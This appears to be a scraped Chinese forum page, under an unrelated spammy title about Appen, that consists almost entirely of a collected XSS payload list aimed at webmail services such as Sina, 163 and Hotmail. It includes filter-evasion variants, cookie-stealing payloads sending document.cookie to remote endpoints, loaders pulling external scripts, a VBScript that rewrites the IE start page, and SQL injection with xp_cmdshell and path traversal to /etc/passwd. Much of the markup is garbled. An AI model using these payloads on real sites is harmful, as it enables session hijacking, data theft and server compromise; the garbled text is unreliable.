appen中文录取appen靠谱吗吗
点击联系发帖人
时间:2017-12-15 20:44
邮箱跨站代码收集
&script&alert(&dddd&)&script&
&script&alert('test')&/script&
----------------------------TOM-------------------------------------------------------------------
&img src=/854.gif& width=0 height=0 ononloadload=&alert(52)&&52
&img src=/854.gif& width=0 height=0 onload=&alert(53)&&53
&img src=/854.gif& width=0 height=0 /**/onload=&alert(54)&&54
&ba=&&script&alert(55);&/script&&55
&img/*****/src=# width=0 height=0 /***/onerror=alert(56)&56
&iframe/**/src=&57&/iframe&
&img src=/146.gif onreadystatechange=alert(58)&58
&image src=/146.gif onreadystatechange=alert(59)&59
&style onreadystatechange=alert(60)&60&/style&
&xml onreadystatechange=alert(61)&xxxx&/xml&61
&object type=image src=/146.gif onreadystatechange=alert(62)&62
&img type=image src=/146.gif onreadystatechange=alert(63)&63
&P STYLE=&behavior:url('#default#time2')& onEnd=alert(64)&64
&P STYLE=&behavior:url('#default#time2')& onBegin=alert(65)&65
&style&&img src=&&/style&&img src=x onerror=alert(66)//&&66
----------------------------------------------------------------------------------------------
&DIV STYLE=&background-image:\6C\61\73\69\3A\65\28\002F\73\002F\&&
&frameset onload=alert(1)&
&IMG SRC=&jav ascript:alert('XSS-1');&&
&IMG &&&&&SCRIPT&alert(&XSS-2&)&/SCRIPT&&&
Hello,80sec &&/xss style=&x:expression(alert(document.cookie))&&
&img src=/989.gif onLoad=alert(/xss-3/);&
&img src=&javascript:alert(/xss-4/)& width=100&
&img src=&#& style=&Xss:expression(alert(/xss-5/));&&
input {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
&/style& &
&input type=&text&&
a {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
&marquee style=&background-color:red& onstart=&alert('monyer')& &asdf&/marquee&
&div&\n&marquee style=\&BACKGROUND-COLOR:\& onstart=&alert('monyer')&\n&asdf&\/marquee&&\/div&
&img src=&marquee style=&background-color:red& onstart=&alert('monyer')& &onerror=alert(/XSS-6/)&&&/marquee&
&img src=&marquee style=&background-color:red& onstart=&alert('monyer')& &onerror=onerror=alert(/XSS-7/)&&&marquee&
&img src=&marquee style=&background-color:red& onstart=&alert(/&/&) &onerror=onerror=alert(/XSS-8/)&&&marquee&&
这个新浪只差一个&闭合了
&img src=&&marquee style=&background-color:red& onstart=&alert(&(&) &onerror=onerror=alert(/XSS-9/)&&&marquee&
&img src=& http://xss.jpg&&&; onerror=alert('onerror=')&
这个新浪不让加入
&img src=& http://xss.jpg& onerror=alert('onerror=')&
&img src=& http://xss.jpg& style=\&BACKGROUND-COLOR:\& onerror=alert('onerror=')&
&DIV style=&xss:ex/*ss*/pression(alert('/ycosxhack'))&&&/DIV&
&img src=& http://xss.jpg& onerror=alert('XSS-10')&
&IMG onerror=&alert('XSS-11')& src=& http://xss.jpg&&
&img src=http onerror=alert(/XSS-12/)&
&div style=&background-color:red& onmouseenter=&alert('monyer')&&123456&/div&
&HTML&&HEAD&
&P&参加&/P&
&div id=&nini& style=&display:none&&window.xx=2;var f=document.createElement('script');f.src='http://www./test.js'.replace(/!/g,String.fromCharCode(38));document.getElementsByTagName('head')[0].appendChild(f)&/div&&style&&!--a{font-size:14font-family:arial,verdana,sans-&/style&&div&;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(window.xx!=2?eval(nini.innerHTML):1);&/div&&style&}--&&/style&&a&&/a&&img width=&1& height=&1& src=&http://www./test.js&&
&/BODY&&/HTML&
网易最新的xss
&script defer=&defer&&var a,b,c,d,e;a=&http:&;b=&//&;c=&www&;d=&.baidu&;e=&.com&;window.open(a+b+c+d+e,&&,&toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500&);&/script&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&behavior:url(#default#time2)& attributename=innerhtml values=&img/src=`.`style=`display:none`onerror=eval(llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&behavior:url(#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`display:none`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*/XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`display:none`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*/XMLNS:t/*t*/=/*t*/&urn:schemas-microsoft-com:time&/*t*/&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`/*t*/display:none/*t*/`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*///fuckyou///\/XMLNS:t/*t*/=/*t*/&urn:schemas-microsoft-com:time&/*t*/&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`onerror.eval\/\/\/\/\/\/\/\/\/\/\/\\/\/\/\/\////////////////////*t*//*t*//*t*//*t*//*t*/`style=`/*t*/display:none/*t*/`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div style=width:1filter:glow onfilterchange=alert(1)&x
&!--&img src=&--&&img src=x onerror=alert(1)//&&
&comment&&img src=&&/comment&&img src=x onerror=alert(1)//&&
&style&&img src=&&/style&&img src=x onerror=alert(1)//&&
&x '=&foo&&&x foo='&&img src=x onerror=alert(1)//'&
&a href=&javascript#[code]&&
&img src=&javascript:[code]&&
&img tdynsrc=&[code]&& [IE]
&input type=&imge& dynsrc=&[code]&& [IE浏览器]
&bagsound src=&[code]&& [IE浏览器]
&&script&[code]&/script&
&{[code]} [N4浏览器]
&img src=&{[code]};&
&link rel=&stylesheet& herf=&[code]&&
&iframe src=&vbscript:[code]&& [IE浏览器]
&img src=&mocha:[code]&& [N4浏览器]
&img src=&livescript:[code]&& [N4浏览器]
&div style=&behaviour:url([link to code])&& [IE浏览器]
&div style=&binding:url([link to code])&& [Mozilla浏览器]
&div style=&width:expression([code]);&& [IE浏览器]
&object classid=&clsid:...& codebase=&javascript:[code]&& [IE浏览器]
[\xCO][\xBC]script&[code][\xCO][\xBC]/script& [UTF-8;IE;Opera浏览器]
& &&a href=&javascript#[code]&&
& &&div onmouver=&[code]&&
& &&img src=&javascript:[code]&&
& &&img dynsrc=&javascript:[code]&& [IE]
& &&input type=&image& dynsrc=&javascript:[code]&& [IE]
& &&bgsound src=&javascript:[code]&& [IE]
& &&&script&[code]&/script&
& &&{[code]}; [N4]
& &&img src=&{[code]};& [N4]
& &&link rel=&stylesheet& href=&javascript:[code]&&
& &&iframe src=&vbscript:[code]&& [IE]
& &&img src=&mocha:[code]&& [N4]
& &&img src=&livescript:[code]&& [N4]
& &&a href=&about:&script&[code]&/script&&&
& &&meta http-equiv=&refresh& content=&0;url=javascript:[code]&&
& &&body onload=&[code]&&
& &&div style=&background-image: url(javascript:[code]);&&
& &&div style=&behaviour: url([link to code]);&& [IE]
& &&div style=&binding: url([link to code]);&& [Mozilla]
& &&div style=&width: expression([code]);&& [IE]
& &&style type=&text/javascript&&[code]&/style& [N4]
& &&object classid=&clsid:...& codebase=&javascript:[code]&& [IE]
& &&style&&!--&/style&&script&[code]//--&&/script&
& &&![CDATA[&!--]]&&script&[code]//--&&/script&
& &&!-- -- --&&script&[code]&/script&&!-- -- --&
& &&script&[code]&/script&
& &&img src=&blah&onmouseover=&[code]&&
& &&img src=&blah&& onmouseover=&[code]&&
& &&xml src=&javascript:[code]&&
& &&xml id=&X&&&a&&b&&script&[code]&/script&;&/b&&/a&&/xml&
& &&div datafld=&b& dataformatas=&html& datasrc=&#X&&&/div&
& &[\xC0][\xBC]script&[code][\xC0][\xBC]/script& [UTF-8; IE, Opera]
&IFRAME SRC=&/&&&/IFRAME&
&script&alert('dddd')&script&
&style&*{x:expression(if(x!=1){alert(1);x=1;})}&/style&
&img lowsrc= &javascript:alert('xss-13')&&
img = new Image(); img.src = &http://127.0.0.1/cookie.?cookie=&+document.img.width=0;img.height=0
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-14&)';&/STYLE&
&img src=&#& style=&Xss:expression(alert('xss-15'));&&&
&img src=&javascript:alert(/xss-16/)&&&
&table background=&javascript:alert(/xss-17/)&&&/table&
&img src=&vbscript:msgbox(&a&)&&
&img src=javascript:alert('www.hackm.com')&
&img src=j	ava	script:wi	ndow.op	en('')&
&img src=javascript:document.write('&Iframe%20src=/jc123%20width=500%20height=550%3E&/iframe%3E')&&
&img src=javascript:document.write('%3CIframe%20src=/jc123%20width=500%20height=550%3E%3C/iframe%3E')&
&img src=javascript:document.write('<Iframe%20src=/jc123%20width=500%20height=550%3E</iframe%3E')&
&script&window.location=('/')&/script&
&img src=&/BLOG/javascript:document.write&('&Iframe%20src=%20width=500%20height=550%3E&/iframe%3E')&
&img src=j avascript:document.write('%3CIframe%20src=%20width=500%20height=550%3E%3C/iframe%3E')&
&img src=&/BLOG/&&;#x6Aavascri& #x70t:document.write('& #x3cIframe%20src=%20width=500%20height=550%3E</iframe% 3E')&
&body onload='window.open(&&)'&
&body onload='window.open(&http://baidu.com&)'&
&meta http-equiv=&refresh& content=&0;url=&&
&img dynsrc=javascript:alert(&hi,163&)&
&img dynsrc=javascript:window.location.href='/getcookie.asp?msg='+document.cookie&。
&marquee onstart=&alert(/xss-18/)&&.&/marquee&
前段时间被过滤的hotmail跨站代码
&font color=&ffffff&& &div id=&jmp& style=&display:none&&nop&/div&&div id=&ly& style=&display:none&&function ok(){return true};window.onerror=ok&/div&&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&&div id=&tap& title=&&& style=&display:none&&&/div&&div id=&tep& title=&&& style=&display:none&&&/div&&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&&/font&
&font color=&ffffff&&
&div id=&jmp& style=&display:none&&nop&/div&
&div id=&ly& style=&display:none&&
function ok()
return true
window.onerror=ok&/div&
&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&
&div id=&tap& title=&&& style=&display:none&&&/div&
&div id=&tep& title=&&& style=&display:none&&&/div&
&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&
&STYLE type=text/css&BODY {
BACKGROUND-IMAGE: url(expression:(javascript:alert('xss-19');); ); MARGIN: 0 BACKGROUND-COLOR: #a00000
FONT-SIZE: 12 COLOR: # LINE-HEIGHT: 20px
FONT-SIZE: 12 COLOR: #000000; TEXT-DECORATION: none
FONT-SIZE: 12 COLOR: #ffff00; TEXT-DECORATION: underline
&style&BR{top:rgb('88',80,'180);top:rgb(') !important height:exPrEsSiOn((window.rrr==123)?xxx=8:(eval(code.title)==20088) || (rrr=123))}',80,'180);}&/style&
&div id=&xxx& style=&DISPLAY: none& title=&try{window['on'+'error']=function(){};if(window.ufoufoufo!=1){framedir='http://xxxxx.196/';xyzxyz=document.createElement('SCRIPT');xyzxyz.src=framedir+'yahoo/time.asp?uid=xxxxx';document.getElementsByTagName('head')[0].appendChild(xyzxyz);ufoufoufo=1;}}catch(e){}&&.&/div&&div style=&DISPLAY: none&&&img lang=&HTML& id=&inner& title=&&img onerror=window['eva'+'l'](document.getElementById('xxx').title); src=http://#&& width=0 src=&http://#& style=&background:`url(http:// onerror=this.parentNode[this.id+this.lang]=this.//)`&&&/div&&
&IMG SRC=&javascript:alert(&XSS-20&);&&
&IMG SRC=javascript:alert(&XSS-21&)&
&IMG SRC=&javascript:alert(String.fromCharCode(88,83,83))&&
&IMG SRC=&jav ascript:alert(&XSS-22&);&&
&SCRIPT/XSS SRC=&/xss.js&&&/SCRIPT&
&&SCRIPT&alert(&XSS-23&);//&&/SCRIPT&
&iframe src=/scriptlet.html &
&INPUT TYPE=&IMAGE& SRC=&javascript:alert(&XSS-24&);&&
&INPUT TYPE=&IMAGE& SRC=&javascript:alert('XSS-24');&&
&BODY BACKGROUND=&javascript:alert(&XSS-25&)&&
&BODY ONLOAD=alert(document.cookie)&
&BODY onload!#$%&()*~+-_.,:;?@[/|&]^`=alert(&XSS-26&)&
&IMG DYNSRC=&javascript:alert(&XSS-27&)&&
&IMG DYNSRC=&javascript:alert(&XSS-28&)&&
&BR SIZE=&&{alert(&XSS-29&)}&&
&IMG SRC=&vbscript:msgbox(&XSS-30&)&&
&TABLE BACKGROUND=&javascript:alert(&XSS-31&)&&
&DIV STYLE=&width: expression(alert(&XSS-32&));&&
&DIV STYLE=&background-image: url(javascript:alert(&XSS-33&))&&
&STYLE TYPE=&text/javascript&&alert(&XSS-34&);&/STYLE&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert(&XSS-35&)&)}&/STYLE&
&?=&&SCRIPT&alert(&XSS-36&)&/SCRIPT&&?&
&A HREF=&javascript:document.location=&/&&&XSS&/A&
&IMG SRC=javascript:alert(&XSS-37&)&
&EMBED SRC=&http://ha.ckers.org/xss.swf& AllowScriptAccess=&always&&&/EMBED&
b=&URL(&&&;
c=&javascript:&;
d=&alert(&XSS-38&);&&)&;
eval(a+b+c+d);
&img src=&url.gif& dynsrc=&url.avi&&
&bgsound src=&sound.wav& loop=3&
&img src=&SAMPLE-S.GIF& dynsrc=&SAMPLE-S.AVI& start=mouseover&
&script&window.location=&&&/script&&
&script language=Script&alert(&终于有人上当的了!&)&/script&
&TABLE background=javscript:alert(/xss-39/)&
&iframe src=javascript:alert(/xss-40/)&
&a href=javascript:alert(/xss-41/)&
&DIV STYLE=&background-image: url(javascript:alert('XSS-42'))&&
&DIV STYLE=&width: expression(alert('XSS-43'));&&
&DIV STYLE=&width: exp/*xss*/ression(alert('XSS-44'));&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-45&)';&/STYLE&
&script&open(/*
*/&http://127&/*
*/+&.0.0.1/&/*
*/)&/script&
&script&/*
*/String/*
*/fromCharCode/*
*/111,99,/*
*/......./*
*/&/script&
&script language=&VBScript&&
Set RegWsh = CreateObject(&WScript.Shell&)
RegWsh.RegWrite &HKCU\Software\Microsoft\Internet Explorer\Main\Start Page&, &&&
&a href=&javascript:alert('xss-46');&&Click here&/a&
&form method=&post& action=&javascript:alert('xss-47');&&
&input type=&submit& value=&Submit&&
&img src=&javascript:alert('xss-48');&&&!--只有ie能成功--&
&object type=&text/x-scriptlet& data=&&&&/object&&
&img src=javascript:alert('www.hackm.com')&
&style type=&text/css&&
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
&font color=&ffffff&& &div id=&jmp& style=&display:none&&nop&/div&&div id=&ly& style=&display:none&&function ok(){return true};window.onerror=ok&/div&&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&&div id=&tap& title=&&& style=&display:none&&&/div&&div id=&tep& title=&&& style=&display:none&&&/div&&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&&/font&
&img src=javascript:document.write('%3CIframe%20src=%20width=500%20height=550%3E%3C/iframe%3E')&
Xsstc { background-image: url('about:blank#Hello%20World'); }&
Xsstc.exec('/test.css', showResponse)
&font color=&ffffff&&&
& & &&div id=&jmp& style=&display:none&&nop&/div&
& & &&div id=&ly& style=&display:none&& & & &//这几个DIV是用来分段存储exp内容的
& & & & &function ok(){return true};
& & & & &window.onerror=ok
& & &&/div&
& & &&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&
& & &&div id=&tap& title=&&& style=&display:none&&&/div&
& & &&div id=&tep& title=&&& style=&display:none&&&/div&
& & &&style&
&//以下是EXP的开始,一个二元表达式内嵌利用代码。代码把div中存储的内容取出来然后加一起,形成了最终shellcode。
& & & & &div{background-image:expression(
& & & & & & &javascript:1?document.write(
& & & & & & & & & & &EC_tip.title+';top:'+EC_tap.title+'/a'+
& & & & & & & & & & &EC_tep.title+EC_tap.title+'script id=nop'+
& & & & & & & & & & &EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+
& & & & & & & & & & &EC_tep.title+EC_tap.title+
& & & & & & & & & & &'script src=http://localhost/1.js'+
& & & & & & & & & & &EC_tep.title+EC_tap.title+'/script'+
& & & & & & & & & & &EC_tep.title)
& & & & & & & & & & &:1=1);
& & & & & & & & &}
& & & & &&/style&
&img src=&java script:alert(/xss-49/)& width=0&&
&img src=&#& onerror=alert(/xss-50/) width=0&&
&a href=&replace.htm#state=0&url=/&script&alert('xeye')&/script&&&xeye&/a&
&link type=&text/css& rel=&stylesheet& href=& & /&
&body{background: url(javascript:alert(document.cookie); ) }&/body&
&script/hello&alert(/xss-51/)&/script/world&
&img/ssssss/src=&javascript:alert(/1/)&&
&IMG SRC=`javascript:alert(/2/)`&
&IMG/src/SRC=`SRC//=//javascript:alert(/2/)`&
&IMG/src=javascript:alert(/2/)`/SRC=`;SRC=javascript:alert(/2/)&
&style&body{xss:expression(alert(/xss-52/))}&/style&
&style&@import 'javascript:alert(/xss-53/)'; &/style&
&script&alert(&XSS-54&)&/script&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-55&)';&/STYLE&
&style&@\im\port'\ja\vasc\ript:alert()';&/style&
&style&@\im\po\rt'\0ja\0va\0sc\0ri\0pt:alert()';&/style&
&STYLE&@\0im\port'\0ja\vasc\ript:alert(&XSS-56&)';&/STYLE&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS-57')&)}&/STYLE&
&STYLE TYPE=&text/css&&.XSS{background-image:url(&javascript:alert('XSS-58')&);}&/STYLE&&A CLASS=XSS&&/A&&
&marquee onstart=&alert(/2/)&&.&/marquee&
&div style=&xss:ex/**/pre/**/ssion(alert('xss-59'))&&
&div style=&xss:ex/**/pre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)))&&
&DIV STYLE=&width: expression(alert('XSS-60'));&&
&div style=&background:url('javascript:alert(1)')&&&
&DIV STYLE=&background-image: url(javascript:alert('XSS-61'))&&
&div id=&mycode& expr=&alert('hah!')& style=&background:url('javascript:eval(document.all.mycode.expr)')&&
&div id=&mycode& expr=&alert('hah!')& style=&background:url('java\script:eval(document.all.mycode.expr)')&&&
&BODY BACKGROUND=&javascript:alert('XSS-62')&&
&BODY ONLOAD=alert('XSS-63')&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS-64');&&
&FRAMESET&&FRAME src=javascript:alert('XSS-65')&&/FRAME&&/FRAMESET&
&TABLE BACKGROUND=&javascript:alert('XSS-66')&&
&iframe src=&vbscript:alert()&&
&IFRAME src=javascript:alert('XSS-67')&&/IFRAME&
&IMG STYLE='xss:expre\ssion(alert(&XSS-68&))'&
&img src=&#& style=&Xss:expression(alert('xss-69'));&&
&IMG src='vbscript:msgbox(&XSS-70&)'&
&IMG DYNsrc=&javascript:alert('XSS-71')&&&
&IMG LOWsrc=&javascript:alert('XSS-72')&&
&img src=&javascript:alert('3');&&
&img src=/892.jpg& onerror=alert('4')&
&img src=&javascript:alert('XSS');&&
&IMG src=		)&
&img src=&javascript:alert('XSS');&& =&img src=&javascript:alert('5');&&
&img STYLE=&background-image: url(javascript:alert('6'))&&
javascript:document.write(&&script src=/1.js&&/script&&)&
&img src=&javascript:alert(/10/)&&
&img src=&#& onerror=alert(/11/) &
&IMG SRC=&JAVA&115;CRIPT:ALERT('12');&&&/IMG&
&img src=&javascript:alert('XSS-73')&&
&IMG src=&jav	ascript:alert('XSS-74');&&&
&IMG src=&jav
ascript:alert('XSS-75');&&&
&IMG src=&jav
ascript:alert('XSS-76');&&&
javascript:document.write('&scri'+'pt src=/1.txt&'+'&/scri'+'pt&');
RSnake的经典XSS脚本都测试下
[float=expression(alert('xss-77'))]11[/float]
&TABLE BACKGROUND=javscript:alert(/xss-78/)&
163的跨站 &img src=&jav as cript:alert('XSS-79');&&
126 &img src=&javascript:alert('XSS');&&
&img src=&javascript:window.open('/msg.asp?msg='+document cookie);&&
xss.jpg& onerror=window.open('/msg.asp?msg='+'document cookie) width=0&
&img src=&blah&onmouseover=alert()&
&img onmouseover=alert()&&/img&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-80&)';&/STYLE&&
七种tab符	、换行符
、回车符
&img src=&abc&& onmouseover=&[code]&&
&SCRIPT a=&&& SRC=&xss.js&&&/SCRIPT&
&script&/*
*/(&zs&)/*
*/&/script&
&table&&tr&&td background=&javascript:alert(/xss-81/)&&&/tr&&/table&
http://xss.jpg" onerror=alert('4')>
&img onmouseover=alert()&&/img&
&STYLE&@im\port'\ja\vasc\ript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))';&/STYLE&&
&style&@import url(http://xxx.xxx.xxx/xss.css); &/style&
xss:expression(
if(!window.x)//防止重复执行
{alert('xss-82');
window.x=1;
&style & type= &text/css & & media= &all & & title= &Default &&&
.mycss & {&
wuxinlangman:expression(onmousemove=function(){&
this.style.color= &blue &;&
},onmouseout=function(){&
this.style.color= &red &;&
& & &/style&&
& & &body & id= &wuxinlangman &&&
&input & class= &mycss & & value= &wuxinlangman &/&&
&style type=&text/css&&
a {star : expression_r(onfocus=this.blur)}
&a href=&link1.htm&&link1&/a&
&a href=&link2.htm&&link2&/a&
&a href=&link3.htm&&link3&/a&
&style&body{xss:expr/*/*/expression/expression*/ession(alert(/xss-83/))}&/style&
&STYLE&body{xss:exprexpression/expression*/ession(alert(/xss-84/))}&/STYLE&
&style&body{xss:expr/*/*//*/ession(alert(/xss-85/))}&/style&
&STYLE&body{xss:expr/*/ession(alert(/xss-86/))}&/STYLE&
&style&body{xss:expr/*/*/ession(alert(/xss-87/))}&/style&
&STYLE&body{xss:exp_ression(alert(/xss-88/))}&/STYLE&
&style&body{xss:expr/*//*/ession(alert(/xss-89/))}&/style&
&STYLE&body{xss:exp_ression(alert(/xss-90/))}&/STYLE&
&style&body{xss:expr/*///*////*/ession(alert(/xss-91/))}&/style&
&STYLE&body{xss:expr///*/ession(alert(/xss-92/))}&/STYLE&
&style&body{xss:expr/*///**////*/ession(alert(/xss-93/))}&/style&
&STYLE&body{xss:expr///*/ession(alert(/xss-94/))}&/STYLE&
&style&body{xss:expr/*///******////*/ession(alert(/xss-95/))}&/style&
'&&script&alert(document.cookie)&/script&&
='&&script&alert(document.cookie)&/script&&
&script&alert(document.cookie)&/script&&
&script&alert(vulnerable)&/script&&
%3Cscript%3Ealert('XSS-96')%3C/script%3E&
&script&alert('XSS-97')&/script&&
&img src=&javascript:alert('XSS-98')&&&
%0a%0a&script&alert(\&Vulnerable\&)&/script&.&
%22%3cscript%3ealert(%22xss%22)%3c/script%3e&
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini&
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e&
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e&
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html&
&script&alert('Vulnerable');&/script>&
&script&alert('Vulnerable')&/script&&
?sql_debug=1&
a%5c.aspx&
a.jsp/&script&alert('Vulnerable')&/script&&
a?&script&alert('Vulnerable')&/script&&
&&&script&alert('Vulnerable')&/script&&
';exec%20master..xp_cmdshell%20'dir%20 c:%20&%20c:\inetpub\wwwroot\?.txt'--&&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&
%3Cscript%3Ealert(document. domain);%3C/script%3E&&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=&
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=&
../../../../../../../../etc/passwd&
..\..\..\..\..\..\..\..\windows\system.ini&
\..\..\..\..\..\..\..\..\windows\system.ini&
'';!--&&XSS&=&{()}&
&IMG SRC=&javascript:alert('XSS-99');&&&
&IMG SRC=javascript:alert('XSS-100')&&
&IMG SRC=JaVaScRiPt:alert('XSS-101')&&
&IMG SRC=JaVaScRiPt:alert(&XSS&)&&
&IMG SRC=javascript:alert('XSS')&&
&IMG SRC=		)&&
&IMG SRC=javascript:alert('XSS')&&
&IMG SRC=&jav	ascript:alert('XSS-102');&&&
&IMG SRC=&jav
ascript:alert('XSS-103');&&&
&IMG SRC=&jav
ascript:alert('XSS');&&&
&&IMG SRC=java\0script:alert(\&XSS\&)&&;' & out&
&IMG SRC=& javascript:alert('XSS');&&&
&SCRIPT&a=/XSS/alert(a.source)&/SCRIPT&&
&BODY BACKGROUND=&javascript:alert('XSS')&&&
&BODY ONLOAD=alert('XSS')&&
&IMG DYNSRC=&javascript:alert('XSS')&&&
&IMG LOWSRC=&javascript:alert('XSS')&&&
&BGSOUND SRC=&javascript:alert('XSS');&&&
&br size=&&{alert('XSS')}&&&
&LAYER SRC=&http://www.nspcn.org/xss/a.js&&&/layer&&
&LINK REL=&stylesheet& HREF=&javascript:alert('XSS');&&&
&IMG SRC='vbscript:msgbox(&XSS&)'&&
&IMG SRC=&mocha:[code]&&&
&IMG SRC=&livescript:[code]&&&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS');&&&
&IFRAME SRC=javascript:alert('XSS')&&/IFRAME&&
&FRAMESET&&FRAME SRC=javascript:alert('XSS')&&/FRAME&&/FRAMESET&&
&TABLE BACKGROUND=&javascript:alert('XSS')&&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&&
&DIV STYLE=&behaviour: url('http://www.how-to-hack.org/exploit.html');&&&
&DIV STYLE=&width: expression(alert('XSS'));&&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS&)';&/STYLE&&
&IMG STYLE='xss:expre\ssion(alert(&XSS&))'&&
&STYLE TYPE=&text/javascript&&alert('XSS');&/STYLE&&
&STYLE TYPE=&text/css&&.XSS{background-image:url(&javascript:alert('XSS')&);}&/STYLE&&A CLASS=XSS&&/A&&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS')&)}&/STYLE&&
&BASE HREF=&javascript:alert('XSS');//&&&
getURL(&javascript:alert('XSS')&)&
a=&get&;b=&URL&;c=&javascript:&;d=&alert('XSS');&;eval(a+b+c+d);&
&XML SRC=&javascript:alert('XSS');&&&
&& &BODY ONLOAD=&a();&&&SCRIPT&function a(){alert('XSS');}&/SCRIPT&&&&
&SCRIPT SRC=/384.jpg&&&/SCRIPT&&
&IMG SRC=&javascript:alert('XSS')&&
&!--#exec cmd=&/bin/echo '&SCRIPT SRC'&--&&!--#exec cmd=&/bin/echo '=http://www.nspcn.org/xss/a.js&&/SCRIPT&'&--&&
&SCRIPT a=&&& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT =&&& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT a=&&& '' SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT &a='&'& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT&document.write(&&SCRI&);&/SCRIPT&PT SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&A HREF=http://www.go//&link&/A&&
&!--[if true]&&img onerror=alert(1) src=--&
&form action=javascript:alert(1)&&input type=submit&
&input autofocus onfocus=alert(1)&
&select autofocus onfocus=alert(1)&
